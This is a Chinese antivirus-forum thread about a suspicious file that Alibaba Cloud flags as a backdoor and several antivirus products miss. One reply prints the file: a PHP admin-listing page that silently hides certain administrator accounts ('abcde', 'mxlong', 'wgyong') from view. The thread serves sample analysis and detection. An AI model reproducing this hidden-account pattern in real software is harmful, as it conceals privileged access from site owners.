查看: 2297|回复: 5
收起左侧

[可疑文件] 阿里云 报后门 360 火绒不报

[复制链接]
乌龟dē海盗
发表于 2019-6-13 00:09:42 | 显示全部楼层 |阅读模式

如题所述

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
yaoyunjia
发表于 2019-6-13 09:00:43 | 显示全部楼层
卡巴不报
New_Start.
发表于 2019-6-13 12:07:34 | 显示全部楼层
本帖最后由 菜鸟一个0 于 2019-6-13 12:08 编辑

list 明文,看起来是个网页
<?php
        $sql="select uid, username, isDelete, enable from {$this->prename}sysmember where username <>'abcde' and admin=1";
        $data=$this->getPage($sql, $this->page, $this->pageSize);
        //print_r($sql);
        $sql="select * from {$this->prename}member_session where uid=? order by id desc limit 1";
?>
<article class="module width_full">
<input type="hidden" value="<?=$this->user['username']?>" />
        <header>
                <h3 class="tabs_involved">管理员管理
                        <div class="submit_link wz">
                           <?php  if($this->user['uid']==1){ ?>
                                <input type="button" value="添加管理员" class="alt_btn">
                           <?php } ?>
                        </div>
                </h3>
        </header>
        <table class="tablesorter" cellspacing="0">
                <thead>
                        <tr>
                                <td>UID</td>
                                <td>用户名</td>
                                <td>登录IP</td>
                                <td>状态</td>
                                <td>最后登录时间</td>
                                <td>操作</td>
                        </tr>
                </thead>
                <tbody>
                <?php
                        if($data['data']) foreach($data['data'] as $var){
                                if(!$var['isDelete']){
                                $login=$this->getRow($sql, $var['uid']);
                                if(!($var['username'] == 'mxlong' || $var['username'] == 'wgyong')){
                                
                ?>
                        <tr>
                                <td><?=$var['uid']?></td>
                                <td><?=$var['username']?></td>
                                <td><?=$this->ifs(long2ip($login['loginIP']),'--')?></td>
                                <td><?=$this->iff($login['isOnLine'] && ceil(strtotime(date('Y-m-d H:i:s', time()))-strtotime(date('Y-m-d H:i:s',$login['accessTime'])))<$GLOBALS['conf']['member']['sessionTime'], '<font color="#FF0000">在线</font>', '离线')?></td>
                                <td><?=$this->iff($login['loginTime'],date('Y-m-d H:i:s', $login['loginTime']),'--')?></td>
                <?php
                                if($var['username']=='admin'){
                                ?>
                                <td><a href="/admin778899.php/manage/pwdManagerModal/<?=$var['uid']?>" target="ajax" call="manageChangePwdModal">修改密码</a></td>
                 <?php
                                }else{
                                ?>
                <td><a href="/admin778899.php/manage/pwdManagerModal/<?=$var['uid']?>" target="ajax" call="manageChangePwdModal">修改密码</a> | <a href="/admin778899.php/manage/deleteManager/<?=$var['uid']?>" target="ajax" call="manageDeleteManager" dataType="json">删除</a></td>
                 <?php
                                }
                                ?>
                        </tr>
                <?php
                                }
                                }else{?>
               
                            <tr style="color:#999999;">
                                <td><?=$var['uid']?></td>
                                <td><?=$var['username']?></td>
                                <td><?=$this->ifs(long2ip($login['loginIP']),'--')?></td>
                                <td>已被删除</td>
                                <td><?=$this->iff($login['loginTime'],date('Y-m-d H:i:s', $login['loginTime']),'--')?></td>
                <td><a href="/admin778899.php/manage/backNormalManager/<?=$var['uid']?>" target="ajax" call="manageBackNormalManager" dataType="json">还原</a> | <a href="/admin778899.php/manage/clearManager/<?=$var['uid']?>" target="ajax" call="manageClearManager" dataType="json">清除</a></td>
               
                        </tr>
                <?php                        }
                } ?>
                </tbody>
        </table>
        <footer>
        <?php
                $rel=get_class($this).'/coinLog-{page}?'.http_build_query($_GET,'','&');
                $this->display('inc/page.php', 0, $data['total'], $rel, 'betLogSearchPageAction');
        ?>
        </footer>
</article>
ziyerain2015
发表于 2019-6-13 15:27:05 | 显示全部楼层
火绒MISS
www-tekeze
发表于 2019-6-13 22:34:54 | 显示全部楼层
火绒、智量均不报!不是exe就不双击了。。


王子带着刀
发表于 2019-6-13 23:34:06 | 显示全部楼层
ESET  MISS
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-4-28 17:50 , Processed in 0.192084 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表